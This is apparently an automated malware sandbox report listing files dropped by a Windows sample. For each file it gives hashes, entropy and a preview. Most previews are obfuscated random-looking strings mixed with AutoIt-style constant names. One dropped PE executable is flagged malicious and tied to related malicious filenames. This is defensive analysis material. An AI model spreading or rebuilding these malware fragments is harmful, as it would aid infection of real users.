                                                                                                                                                    Preview:L0Dre13..FontConstants ComboConstants..c4p4x0233h4Y2TlxYm..StructureConstants ButtonConstants..5BxZl05d374ytDb39mg3eb54A203rx7GD1C0Cf6..BorderConstants FileConstants..32Itu9a28E390F5C6b7W2F..ButtonConstants ColorConstants..012O84wL9916xX34Su85Q6RGZ9375082MRi2xKyQLgQ6gn4U9917a32QB44qL1Wn1O60T4w6lLmj90z5BUW62Y4SV78Yh40290..DateTimeConstants FontConstants..3816s6k67t10jhWctrKw248yK58609635IPZ56h3GL1M4iO22A0Ht4kT51ZtDVy59XP96o6yr65kZVYFma4326X7Tr3G2060K2U7p207N7Sb75bP..ToolbarConstants ButtonConstants..
                                                                                                                                                    Process:C:\Users\user\Desktop\M1Y6kc9FpE.exe
                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):602
                                                                                                                                                    Entropy (8bit):5.600351569577517
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:OXk5vR/8cAr/X9QGeSz+s9tzuwXb21dP0zxb3evR3N:OXk5vps/X9QGers9td4dP0Nb3S3N
                                                                                                                                                    MD5:382FB868BF2C280F0A67B8055EFB9928
                                                                                                                                                    SHA1:C740CEB7A49FB1F77EC225529DF364DD133D3675
                                                                                                                                                    SHA-256:97F52EADD90E55427D8350F2E5585D9C15B8E00BA82CEA1FD09FF95445D957D7
                                                                                                                                                    SHA-512:1BB8BB9379E8ECFD3F7D90E2AA910825B91F6E29F9CC0D6AFF3266D351ACD3060497D2F8B59B4A285BB015CB893FEB4920E79EF23F7E7139011C4DCE4BC06805
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:6g9IYv05NmY8U3lIz8MbxrB554y59UHm7bjYu029BH9shFfxql01qMx1MdRPEk8079X8p443X1KE4Z7Gn2t662B02O88B9W1d1f052z247324L0I3n38k014WXci89bo1R4ItC4wXEMFXLyN0i44465p0962Hj762dghB70157Ixm2X2enVEA6482X2z..ToolbarConstants UpDownConstants..t703W7u7s6E45q43oDaU869dvR2lk4vaTX4b91C3n3G23..ToolbarConstants GuiDateTimePicker..3lV20Yn2w3F73ph435ZZB828N3mrQUn084GF1vl1hjYk14L562h69g749H3rET677a9F1390EH3L4b2wBgRVL3S938Qyyz90m5H99..BorderConstants ToolbarConstants..E525f7P1oQW97ad83kszCq4C8wzc846t221s65qR401rTe61QL9s318LC7aU1fTn914gy2o74mH627812ig6k2p8w56f4E90kS6d2344nVo4hv1ZG471i92nI8xVl..FontConstants ButtonConstants..
                                                                                                                                                    Process:C:\Users\user\Desktop\M1Y6kc9FpE.exe
                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):509
                                                                                                                                                    Entropy (8bit):5.43409369817081
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:RGrvKNNfgOqhXsefdMGIUycy6F1SoOBPc:RiKNxgOqhXsYIUiMS7O
                                                                                                                                                    MD5:C4B81747B551CF4FCCC5C0E552252649
                                                                                                                                                    SHA1:8C6C293777A93B8752450437CBA667B05C9E23F6
                                                                                                                                                    SHA-256:B4B21FBA0D3DBA4AE00C9EB45E2E193E273547FA86B1E4C77C47A58DC80231BA
                                                                                                                                                    SHA-512:49E5DC0E9A2DFC7F729A1F8F757FA7ECDC7BBCE3C20B17DCFFC45F04A14943DA30758F55B43BD5A1270E07A8CCD848044834D05C89E65F2487117B8C810F6937
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:1i65R30aDx6Am77I73j38bNATE404U27EU42Q20f1UU69BX4Ud0g59JV2071nkO81Yb2131485..ComboConstants ButtonConstants..03ZDf5Ipd29U6D53q5Bdr93u37Yv561Oxu79iD56YZnwwJA4266su9AU53H4b70w4951..BorderConstants FontConstants..53LTuB5FW08K69E3kMBuA2d42M3z87qz521x3v14..GuiDateTimePicker UpDownConstants..5X37555l42Y24uD8Id9B..StructureConstants FontConstants..3H2382nZaoX392M657Ft8Ly1147d7v8..DateTimeConstants ComboConstants..236Ka3585h02i7C54R827snLO8nR85UHxH05329u6RTbi981fP11068a9576s..DateTimeConstants TreeViewConstants..
                                                                                                                                                    Process:C:\Users\user\Desktop\M1Y6kc9FpE.exe
                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):648
                                                                                                                                                    Entropy (8bit):5.52835035781214
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:6FAbf+QBacUXCqJ5MclrGVcnckdeIHVpuTz9NdpvBYXDlFNX2/Oyf:6FAqQBEXCqJ28GVEckdeIHCfdpvud23f
                                                                                                                                                    MD5:FB7BC1E54A3A13C46ABEFB4B5894EAFB
                                                                                                                                                    SHA1:6E1EB3DF791408DB1CD6428582F5F057C755B3E8
                                                                                                                                                    SHA-256:1F5B7C71AD67BDFB5598D77F70CB9A7CAFC02AB47AF0140722DA2A75F21DE972
                                                                                                                                                    SHA-512:9657589C71AF1CA199E45A5B1F3A8BF225A12288D642BA476AE022C3D69CEF30D29D8C797BBA4F8FEF0EFFA8262723E289417DE394CB90C21C79231410C9ACAF
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:01CtI38o1H76Y8R5Ogu5366zoDg3S817..GuiDateTimePicker FileConstants..02f8b733ir5vC5mALCrZ24c474N0n4tcy7Z17rOR13F9r72477j44T..ButtonConstants FontConstants..550ne570930595iapUEGo9GY8K1L2Vu0n61N8858l0782vrFm91Y140x59t206s5HxP0BSB0aW4l42BFjU6O041G6t7J5pU29u..FontConstants BorderConstants..95h7P1tRRy66DV81X0hdZ70kRscuJ3LNugs7DV7237q4xZS68z6a22wSrw027FVqeroH44H..BorderConstants ToolbarConstants..135Liw32lOvj29LFB8P630N48Rd9A8jJFK344Z17807nKY9x936tKyo41..ColorConstants BorderConstants..1CX774W775hcAH0Q5HD9V7O2h448iv2jk2u605nIe82477P2lMNZI48y3ihav43fT2dfa176RqN20O8m581wyw1r2Cw9P9703h7cTb084Rjl6683Yf90207F7t3Z58Xtr8i..ButtonConstants ColorConstants..
                                                                                                                                                    Process:C:\Users\user\Desktop\M1Y6kc9FpE.exe
                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):686
                                                                                                                                                    Entropy (8bit):5.609085570277811
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:f0lWGZEo5epC4RXitZ6V8lqHx3Ol+/SwZBChhdRDjORlFPI1h2rEbWVs4Kqvx:xGqC4RXMK8qO4/S8BChHR+3C1Wku
                                                                                                                                                    MD5:AD648C8818A74800CEA50CA6D7AFB649
                                                                                                                                                    SHA1:F146194D6B62FD61BB37B2A9A7DF64F5BD6D7BB0
                                                                                                                                                    SHA-256:C32B59E53FE7283D8FD4BBB2BA8FB9B68D27683FC4F773B7025AEBD4E71E654B
                                                                                                                                                    SHA-512:9885E22FF1B1666916BBDDA72B8F40D8ED8CC7015CE6529CE552102F0C379D8352CB7F65176B9A55AD1D857FA50211B220CBBD2C81730E9297C8E03597ED083B
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:9M5ut700bF7z5pv6aF6w1FaPKq03o9mzq1jtS64Wxd3R499GEm3P84Q1ET4R1..DateTimeConstants GuiDateTimePicker..50582ShsYU4pD5L56Zl1q..UpDownConstants ColorConstants..2h4T8fq0z6S80l9133815E636F657xb37q74V21FfUGXP91nCw1L1ts4jPjb65lHCW96C2F08m3486jk85w7L5omIu66VP41rCLS49UVZJ8VXgo453e327U7Z0xH0mi4..DateTimeConstants FontConstants..1355d741H8T712f497T6m81P42Epn57d02ZlPvi4o131IsUYG086Gi220D3Kf2P1LNS1Ac130G4GSt096c1WE8GF3oE88m641560297NNO6GA4pl27K44DN44RpJU848Q183CrNFlD..TreeViewConstants BorderConstants..UGq4898hLl9fKn3k97p29589uw6AJ0012yg71L2UmX6132v5i0l1Hz62u2oSxV5987o6iYa766qa06057GHC8F3lOH3cU78bVjM6a3NHD7QF7x062152997n1vWq0VxQzv4tD2V59Xir1kR317k3bC1S780..DateTimeConstants ToolTipConstants..
                                                                                                                                                    Process:C:\Users\user\Desktop\M1Y6kc9FpE.exe
                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):534
                                                                                                                                                    Entropy (8bit):5.553428869759938
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:rrEvL7sn0PVaJuyfkx0PU9rPVuzP+Gqv4:rrGgXkxfdPVM+Gv
                                                                                                                                                    MD5:44BCCC48AEA68F6C7601B4C28E13DFFE
                                                                                                                                                    SHA1:2F6DE537DFC7BE56A1DDE34817428EFFC89D09AD
                                                                                                                                                    SHA-256:12DF5C527A4FA33C11945127CAE2B627FC904F903B3D5E1FA790FA5E93526DCF
                                                                                                                                                    SHA-512:B36429D395D36654781659B544ADFE26C99DFE0FBB579C24C6907287B7807BDB25967E06908779EE6F6FF324C863FAF7A6C9162040C1D4CCCC6649A7ECB5AD38
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:89069X8LAB4l8RR52uXi71900vB640p53vq949FjzvRBeYon6H183851210jF1o..ButtonConstants ToolTipConstants..BnR6bX1b3X8099F8109m1400T5K4iJ5oje19BK4b783wQUp6r227ghnv9UrH9UO6jd4i026v7gGg62QX..TreeViewConstants ColorConstants..1229WIHF4344S77Xv96h52M5d04Ac59hLpY0r2RXubMt55h9SD09U12eqB3Inp0iJqyRB0964AwT912uON1x45VJnB1184e44b..TreeViewConstants FontConstants..s5K9Z75872s736EzEov7M4L5QAm016662L7h7j15u466vi6UM39iRl4Hhy1004Lk43w4lg51v5543R8qBD4u38Fck0535c7512mRMblz54890516n7q5fOJ30qty0062AJL4EO35gn8a2KtL3f53z9yP..ComboConstants UpDownConstants..
                                                                                                                                                    Process:C:\Users\user\Desktop\M1Y6kc9FpE.exe
                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):508
                                                                                                                                                    Entropy (8bit):5.444647219340999
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:AwZsTyknfb56qFZJwkwjGjy4FBP8kkkpct:RsHnz56qZYGjywmlkpY
                                                                                                                                                    MD5:95ED1612D4995A1339883F3C2DA20BED
                                                                                                                                                    SHA1:BBA7FEABF0182AAF1BF2B48314BE515C9326A686
                                                                                                                                                    SHA-256:B2FFD14EE25FFEACE578F6FD512FC49005AFF59FD057607D0FA2C600DAFED696
                                                                                                                                                    SHA-512:3B3EA03399C734A2C927EF41FFD971306504F672E4B5FA8AB7897CD54C5986FF2EC0BAB0825860746AD262D8F89D59D0797EE5B13628E40B45F83F8256C4A266
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:50q42698J25h..DateTimeConstants FontConstants..u24v210sq759b2750lGgVn3J019OkLP1N8tSU7b6sqQ2xx3005x92xk56R583R7B87P2882xh111i87m3l29KP49Pb1JNL8172732F5712UcxfIVr039w01TM624419osyZp..DateTimeConstants ComboConstants..o8FcF87jYazt7lf9P42jm59t4s60300394oP7332fw273r1879944JM7J8Sm9z6i7wd0UR90q90..ToolbarConstants BorderConstants..6l595I52..ButtonConstants TreeViewConstants..TqqXG09gYin3J78x51H7j215vm0g08u2715A48K31BVmS4P6q7pZ5oNr67eO62a55Y77a1000TmId3r9L08r1hBF5K0y60H2G1lT23iw0..FileConstants ComboConstants..
                                                                                                                                                    Process:C:\Users\user\Desktop\M1Y6kc9FpE.exe
                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):572
                                                                                                                                                    Entropy (8bit):5.522453659556589
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:ZBfrt2UERrH5IhZL85zxhOORdCT+CqVUIdm3Wot87R:ZJ523NYZRgYtkm27R
                                                                                                                                                    MD5:FC495C99E26C918CCCAFE8A212355EE9
                                                                                                                                                    SHA1:15A87B4265DA49FB5D9EDADE69111D49BA55B8DA
                                                                                                                                                    SHA-256:010E35603796229A5EEA475725E2F191DFEFCB0AE06306E8502045A84FCA335F
                                                                                                                                                    SHA-512:80AB91EE659BFC895F8AAE514D63DA5DD8F3F53CB2C16B91A24F0CBFD83D604026C18C5FF0237E8E8754242A96C74655CAB215548FDEA894EB56CB7C0FC8922B
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:d32tfVU8R4M9E1289d0Co62qwZYq3860U9O7Iki56760q1ak4m985d1AQ7u6v80H9xFv09s0483u2eVz7vJx18fHJTABR83dZAHT29066AD516Iw6p5f3..ToolTipConstants StructureConstants..1Gg6xiP999yP804oQtyUe74US469544Y3702f5E668ei66t37k7I4Q8Z88793v172M13478548r612S3233iLOvE1853SoZ..BorderConstants ButtonConstants..7778VAG511l7QNAI7xR5185rn7V340An428u1D0tnT98ey2..ToolbarConstants StructureConstants..w2bvphkA731P0SsI0I9w627g2i4oKvp2E3C9sz7G954p2091IFy5r1I0230w5w2789cW7uv8jSun59qTn46878vT9Q92mO28wY9mU0IF094758Xj8t89n08d9S17XjL3l3N5L66C1e2GS0mr2enBUcE75o7B037Oa2r..ToolbarConstants ToolbarConstants..
                                                                                                                                                    Process:C:\Users\user\Desktop\M1Y6kc9FpE.exe
                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):616
                                                                                                                                                    Entropy (8bit):5.593470127639937
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:NWSdpPp4vnIw9ahP6EviWL1eVCmMLXQllE0U7gX+aOmR:Ys4wHJvXe87Tgm0nuaOmR
                                                                                                                                                    MD5:95E90D53B6DD6501967D8E2D9BF0EF8B
                                                                                                                                                    SHA1:EB28D3148C97BE0F2650972F6772E8CE84D86D51
                                                                                                                                                    SHA-256:846E94F46D1201E4AFDF32F0374C90AD4D1E23E89B5000C96EA124C80C8524DA
                                                                                                                                                    SHA-512:B2EA6242F7F2754F4D3D9B478EE97713D8F635393C681164A07AC5C475B623495F9AE0BC243964A591CFE540FDDD4CD195323BB918A63E761AC23E0C4ADED046
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:a71x0l2e8Ec1jejYAwV9295zDkG5u27Y69qY2113380nwbN2Pi149I8J67..TreeViewConstants ToolTipConstants..221eY4ot9822MEPAKV5thUi6o9685ny6C8642EY9QGCUbsY4w88J1bqFeh64017sz7S50p7G4n9ys7WKop02n978F8Q181o6vpIcEF2Z12X..FontConstants GuiDateTimePicker..rCpyBb74r34E92uS1hvc63C7H3vU25yc1yj20P4I84QM87i5i1123TV83j69Dw1381532Vp301YPN3nlGb7vtU5dQlZ2771Kn08184879889w4ux24p1w1p244v0p9259l5edpuJv9K30cl24043513439Nyi..DateTimeConstants DateTimeConstants..35qP760eQR252V7hq65102837jC7xcs45AHkODAT2A45xMK44l0t5HINmG802808Duc45d49H2c74fKP9mvCK04kA46N058k95zmm07w05eW7996VGERpu9j1CJn9dZ7CUr7g5J3x6RUU36TUMQk..FileConstants ToolbarConstants..
                                                                                                                                                    Process:C:\Users\user\Desktop\M1Y6kc9FpE.exe
                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):564
                                                                                                                                                    Entropy (8bit):5.514774909684432
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:JeodvXxNOBJdqM4h6XVgaKkyIO9jxLCwSDe+wXXzJ:Je8vOb34h6XVg887SDe+wXXzJ
                                                                                                                                                    MD5:BC4084B5A1C6B6D70D37A0D4D657FB84
                                                                                                                                                    SHA1:3011BC2E36349DF995CC0440B9579829E4628402
                                                                                                                                                    SHA-256:1581F7FD0889C340453E9A34846A61B899671FC59E8B2E67C98F628C290968A2
                                                                                                                                                    SHA-512:004E366AC7B64D083E329D9EF91C0EBECD9E966F52D93B94C2293EF30CDFA793A6D18E73074FD3148FEDD2FD4EF7E382046050503F1FEE83E20856B9B8DA64D4
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:4kI02Bm527GQp6f2s8YGY69OT315k88932GoMP8v27061U89y618443566MZ288a28WX47M6E79i324B2i2D2m34CYhx8r31f465..BorderConstants UpDownConstants..4U24Q717C3a8l82L3gK9p090B0IQ3dO7hKi2kv6dg0pS831yCju714X2o2..ColorConstants ToolTipConstants..2p9K3W4u9nVf3T..BorderConstants ColorConstants..ah4L3OC481xcsT5253Pge2AyL830858m4u58Ux3v0pgOKdE1333lG5414F4C8De11cWoKH23Gp19mcfNr7J8t954XaW3NSnTC0q0cY6ye0Y387Le3HYsR12EQ..ToolTipConstants DateTimeConstants..j21IC8aRcx8J2M..BorderConstants GuiDateTimePicker..160Jc76FzEjN3OJDJg95Wh372b8690s193640V3na04585Y..FontConstants FontConstants..
                                                                                                                                                    Process:C:\Users\user\Desktop\M1Y6kc9FpE.exe
                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):569
                                                                                                                                                    Entropy (8bit):5.607960549209402
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:wbKXLINQ3giBAseD3lImN8Rq674u2bWwFVCaMlUNJ09ON0aBPc:wbKXMQVBJnmc779gWg9G40aO
                                                                                                                                                    MD5:7399AD2ED1976A8AF8FD293039757336
                                                                                                                                                    SHA1:1B60BB127972D76F4243310B05849C2937E4BE76
                                                                                                                                                    SHA-256:06E60D78DD1402360ED52DD46A1F09787B52CBC4CEF80676F5600CA49CCBBB23
                                                                                                                                                    SHA-512:446FA89E11D2D3EE7ECE303273C573D37AE6A7D490F70101B8A174AE6F3FAE859F51F0FC8D52588B6C6C00FE98C2943556FC8BA9A33D8324CBAA2F649371449B
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:G63Ah60Y48540xIUNl7j2083w0Gnh5514HSH2A53ogqaCpG19VV2c82493j7088nLOuOPU5AWMf09915E2ag96oD5467P412584MW1xLHVZQi6BifJ1245298T3..BorderConstants FontConstants..lpoy252u2POZL4i2w5FZI03pc0g6068ndO1EOklhFmm27646swE3hQ3554gRI9fup9v0l37..FontConstants StructureConstants..5199q8DhUO0Z2Sv1h190iH16p2o9v8U56N600q00C31U6637c9BcB983x6y7M350y7dJz3H133118968N9R3j1437U52237t8I25H..ComboConstants ToolTipConstants..8n5074w2TQK442655GI5N99m1A42Mt03KgSpJN3Y6Xl4n4BV2J9UwgI7qpRJ57KqKh05ZgjU93M5la8iAGl7o4TEKn8WFW3tM24P1U810wE5Y051948CULA454jgHKw28kTr9Q..ComboConstants TreeViewConstants..
                                                                                                                                                    Process:C:\Users\user\Desktop\M1Y6kc9FpE.exe
                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):947288
                                                                                                                                                    Entropy (8bit):6.629681466265794
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24576:fYgAon+KfqNbXD2XJ2PH1ddATgs/u2kaCB+l:f37+KSbq5e1diEnHaCK
                                                                                                                                                    MD5:0ADB9B817F1DF7807576C2D7068DD931
                                                                                                                                                    SHA1:4A1B94A9A5113106F40CD8EA724703734D15F118
                                                                                                                                                    SHA-256:98E4F904F7DE1644E519D09371B8AFCBBF40FF3BD56D76CE4DF48479A4AB884B
                                                                                                                                                    SHA-512:883AA88F2DBA4214BB534FBDAF69712127357A3D0F5666667525DB3C1FA351598F067068DFC9E7C7A45FED4248D7DCA729BA4F75764341E47048429F9CA8846A
                                                                                                                                                    Malicious:true
                                                                                                                                                    Antivirus:
                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                     Joe Sandbox View:
                                                                                                                                                     • Filename: 1aG5DoOsAW.exe, Detection: malicious
                                                                                                                                                     • Filename: Factura-2410-CFDI.bat, Detection: malicious
                                                                                                                                                     • Filename: DGFmCcZnM0.exe, Detection: malicious
                                                                                                                                                     • Filename: qZkywW6Q0b.exe, Detection: malicious
                                                                                                                                                     • Filename: AlBXxWizEX.msi, Detection: malicious
                                                                                                                                                     • Filename: mEudzoO1bG.exe, Detection: malicious
                                                                                                                                                     • Filename: HoGsuqrMLl.exe, Detection: malicious
                                                                                                                                                     • Filename: doc000000037294.exe, Detection: malicious
                                                                                                                                                     • Filename: doc000000037294.exe, Detection: malicious
                                                                                                                                                     • Filename: KKKK.hta, Detection: malicious
                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L...).(c.........."...............................@..................................L....@...@.......@.........................|....P..P............N..X&...0..Pv...........................C..........@............................................text...|........................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc...P....P......................@..@.reloc..Pv...0...x..................@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc
                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):947288
                                                                                                                                                    Entropy (8bit):6.629681466265794
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24576:fYgAon+KfqNbXD2XJ2PH1ddATgs/u2kaCB+l:f37+KSbq5e1diEnHaCK
                                                                                                                                                    MD5:0ADB9B817F1DF7807576C2D7068DD931
                                                                                                                                                    SHA1:4A1B94A9A5113106F40CD8EA724703734D15F118
                                                                                                                                                    SHA-256:98E4F904F7DE1644E519D09371B8AFCBBF40FF3BD56D76CE4DF48479A4AB884B
                                                                                                                                                    SHA-512:883AA88F2DBA4214BB534FBDAF69712127357A3D0F5666667525DB3C1FA351598F067068DFC9E7C7A45FED4248D7DCA729BA4F75764341E47048429F9CA8846A
                                                                                                                                                    Malicious:true
                                                                                                                                                    Antivirus:
                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                     Joe Sandbox View:
                                                                                                                                                     • Filename: 1aG5DoOsAW.exe, Detection: malicious
                                                                                                                                                     • Filename: Factura-2410-CFDI.bat, Detection: malicious
                                                                                                                                                     • Filename: DGFmCcZnM0.exe, Detection: malicious
                                                                                                                                                     • Filename: qZkywW6Q0b.exe, Detection: malicious
                                                                                                                                                     • Filename: AlBXxWizEX.msi, Detection: malicious
                                                                                                                                                     • Filename: mEudzoO1bG.exe, Detection: malicious
                                                                                                                                                     • Filename: HoGsuqrMLl.exe, Detection: malicious
                                                                                                                                                     • Filename: doc000000037294.exe, Detection: malicious
                                                                                                                                                     • Filename: doc000000037294.exe, Detection: malicious
                                                                                                                                                     • Filename: KKKK.hta, Detection: malicious
                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L...).(c.........."...............................@..................................L....@...@.......@.........................|....P..P............N..X&...0..Pv...........................C..........@............................................text...|........................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc...P....P......................@..@.reloc..Pv...0...x..................@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                    Process:C:\Users\user\Desktop\M1Y6kc9FpE.exe
                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):504
                                                                                                                                                    Entropy (8bit):5.6259340620268485
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:nLEs50ubuRJk68a9EKgRecunhJ932kDtx/:LXpbArd9wDuhJR2k/
                                                                                                                                                    MD5:35470D47483607BF2DE0FDC542EFD0A6
                                                                                                                                                    SHA1:C2085CF4A1A687201DCB2AF61D7F2BB28473F664
                                                                                                                                                    SHA-256:E72BF5652C4E6E6FCCB590BFCB2E6081C4C6F540D61ABDE5FF168BA641D34C6F
                                                                                                                                                    SHA-512:D95FFCC8458D3DB253388CFFC61DB76331008AA0D9223E91B8ACB2E1C60AD0C19501720FC67F5207B82B191ECFD8BC75E479C3F37FFBA83493CAC61B11680A36
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:nj3b210Z3UP3L26cnFC2r618n9YZizNA9g8gK1AXX134125Lzy02TEt69Uth0S4Qz5l67Lv885M28zC1330m43x1k6n1015HCA8ZK29UA5X5bHY13..UpDownConstants StructureConstants..eF999mo8xq0t7411wvZjxO11qr2WR9g71P..BorderConstants BorderConstants..8327hUvZe4n53udL12vuK898eh9zn29HLbJ4319wH6j2jN5t9473y7Ef0FOc419K7C6WZ9F7zXVtMXoyDNH15Fu95Fp636..ButtonConstants StructureConstants..v6565y0pM4EXh6bl8ufHEF37mqsf5zNnMs1R19Z1xd8f010cmB6sSaVG7C5UD3m98fjd18934A6cp6K9409385whk4p94T7y65Y10ZUPla6733M01H47..GuiDateTimePicker ComboConstants..
                                                                                                                                                    Process:C:\Users\user\Desktop\M1Y6kc9FpE.exe
                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):533
                                                                                                                                                    Entropy (8bit):5.555122671725166
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:RdDw8Z9v6lt21VgwOBPsptEyIrQakNSc3fA6:jUs9v+rK0bkAc3l
                                                                                                                                                    MD5:18B3CA792233B183954D86380D53BAF2
                                                                                                                                                    SHA1:FE7D78E2EF67B2B37BF608B7D8D2D9820A483322
                                                                                                                                                    SHA-256:4E8D26FBD55BDA61F1CBDA0326439663F32B735D8B70B52D531150AACBE236C8
                                                                                                                                                    SHA-512:6CE4A5ADBB3F9C48C5B35A03188DD0EA9218D2D4A0E79AD19DDFC77FF882A5B39BC57E62C8EC7A4F289E8127E5520E9FF1465FC0502057D43EB61F100522E562
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:b4f726l0QGf76y..ButtonConstants FileConstants..3WbMc4AZ97o6I09TWs53ba879m2l4yVIp43cIp06W213mvDU4w18lKl3rJMz5f2cG00M6535E05v4jr29A22881o4UCj9666hu9l7ic5o442621Kcj453JX68k63..UpDownConstants BorderConstants..073CZ36HV5W1QjzX822E01DxZhY624VCfQ7m3m3574k6fQ64in5a143S44k21VQgq68no8q2A6X8JC81E0597K272m03gRe2C9KBT53..DateTimeConstants TreeViewConstants..52e5PwO90U61RO743Wn9m637x7og2V6VKBWk8mJEr42641Gq9OD79wcv1h2PqR34422GU2uZQ7Mp0b5528biUH121230atT782477cDk2m6w65E70tpFa02BrX6NzNj5k92n762Pqne67512b91mDeo..BorderConstants ColorConstants..
                                                                                                                                                    Process:C:\Users\user\Desktop\M1Y6kc9FpE.exe
                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):578
                                                                                                                                                    Entropy (8bit):5.5345726532215
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:xPX+i9s1IZgyy+naIaSbICMulsOraBP0A9R6ved9:xPX+Gs1IMcf5ICdzaCA36Gd9
                                                                                                                                                    MD5:4C33AC9510E5F22AEA359252392E7DC6
                                                                                                                                                    SHA1:D8F0D8C95A43043F68C1794FF7CEF803CCDCB969
                                                                                                                                                    SHA-256:5603CB963F200915EB60ACEB7837EDB35CB1BE8CCFF16FBA9DD1EAF26272DE06
                                                                                                                                                    SHA-512:96610AC9CEB1040CF1F063D701148848289ED51E7A1A6C235DD684B4A75073FB7BA092686EDD97AFDEEAEF8DF390BE88220633215C42325BFFB141C03D0A98BF
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:5Dm8835K23W09Hj601A42B4U6li2423HmO5e10X4CedB37E0BtoOWy7qT8XVvc1U42j18kC530J1542wMgX08OL..StructureConstants ToolTipConstants..8W5V0m4F54Y5fXRi099K3g4oXt0R0W0Q7h136r9718k56979K915643PGj4BKlH9885023xCJU9jL3KByQL35301oJ0Hm1s693i2U23Kr83Q6umW0589RW7j5G1v22Ywg..GuiDateTimePicker ButtonConstants..3Hp9CZ7851K3ZTPFX88Cm60DtuA9R8wD04q7D4178Q64trFM417b2Ua4glw8Z15Uc6v020D7A18F425By7..ToolbarConstants TreeViewConstants..U5L14060Qasd4Xm82t330h28PZ0e5Wx..StructureConstants StructureConstants..2hCx10E5X5OO753T2X6ZpjtA2039n3jTQ58936346A72Sst21ob7CCk712O..ButtonConstants UpDownConstants..
                                                                                                                                                    Process:C:\Users\user\Desktop\M1Y6kc9FpE.exe
                                                                                                                                                    File Type:Unicode text, UTF-16, little-endian text, with very long lines (420), with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):75082
                                                                                                                                                    Entropy (8bit):2.98395248326991
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:QRzzzzzzzzzzzpYqqqqqqqqqqqqqqqqqqqqqqqqN0YDDDDDDDDDDDDDDDDDDDDDE:pH5mUKW7/3WCv+nohnrQ
                                                                                                                                                    MD5:E35FFF73AEE2E4616A02721A2BB87382
                                                                                                                                                    SHA1:493FB9EE1BE78EE56AFDAAA41B0C96470A20F491
                                                                                                                                                    SHA-256:27BBC7BAED22B649F4F9E5C8F07B46DE15D18AB0D98EA38FF8B28D9690BF553C
